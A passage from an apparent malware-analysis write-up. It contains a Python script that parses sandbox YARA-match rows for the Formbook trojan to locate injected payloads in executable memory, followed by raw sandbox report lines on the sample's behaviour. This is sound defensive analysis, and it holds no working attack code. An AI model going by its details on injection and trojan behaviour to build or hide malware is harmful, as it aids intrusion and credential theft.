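    "Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein",
    "Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group",
    "Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein",
]

# Assumed decoding of the fifth dump-name field (Win32 PAGE_* constants).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

MEM_RE = re.compile(
    r"^Source:\s*(?P<proc>\d+)\.(?P<dump>\d+)\.\d+\.(?P<base>[0-9A-Fa-f]+)\."
    r"(?P<protect>[0-9A-Fa-f]+)\.[0-9A-Fa-f]+\.sdmp,\s*type:\s*MEMORY\s*\|?\s*"
    r"Matched rule:\s*(?P<rule>\S+)"
)
PE_RE = re.compile(
    r"^Source:\s*(?P<proc>\d+)\.(?P<dump>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\."
    r"\d+(?:\.raw)?\.unpack,\s*type:\s*UNPACKEDPE\s*\|?\s*Matched rule:\s*(?P<rule>\S+)"
)


def parse_match(line):
    """Return (proc index, base address, protection name or None, rule) or None."""
    m = MEM_RE.match(line.strip())
    if m:
        prot = int(m.group("protect"), 16)
        prot_name = PAGE_PROTECT.get(prot, f"0x{prot:X}")
        return int(m.group("proc")), int(m.group("base"), 16), prot_name, m.group("rule")
    m = PE_RE.match(line.strip())
    if m:
        # Unpacked-PE rows carry no protection field
        return int(m.group("proc")), int(m.group("base"), 16), None, m.group("rule")
    return None


def payload_regions(rows):
    """Map proc index -> {base address: {"protect": str|None, "rules": set}}."""
    regions = defaultdict(lambda: defaultdict(lambda: {"protect": None, "rules": set()}))
    for line in rows:
        parsed = parse_match(line)
        if parsed is None:
            continue
        proc, base, prot, rule = parsed
        rec = regions[proc][base]
        rec["rules"].add(rule)
        if prot is not None:
            rec["protect"] = prot
    return {proc: dict(bases) for proc, bases in regions.items()}


def executable_payload_processes(regions):
    """Process indices where the payload matched inside executable memory."""
    return sorted(
        proc for proc, bases in regions.items()
        if any(r["protect"] in ("PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE")
               for r in bases.values())
    )


if __name__ == "__main__":
    regions = payload_regions(SAMPLE_MATCHES)
    for proc in sorted(regions):
        for base, rec in sorted(regions[proc].items()):
            print(f"proc {proc}  base 0x{base:08X}  {rec['protect'] or 'unpacked PE'}  "
                  f"rules={','.join(sorted(rec['rules']))}")
    print("payload in executable memory in processes:", executable_payload_processes(regions))
```

On the sample rows the payload appears in process 0 only in a PAGE_READWRITE region, while processes 1, 2 and 9 each hold it in PAGE_EXECUTE_READWRITE memory; together with the per-process native-call sets this is the quickest way to read the injection chain out of a long report. The same dump-name layout also explains the "OriginalFilename ... vs 2435.exe" rows above, which reference memory dumps rather than the file on disk.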
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/4@3/4
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01
          Source: C:\Users\user\Desktop\2435.exe | File created: C:\Users\user\AppData\Local\Temp\nsq164.tmp
          Source: 2435.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2435.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\2435.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts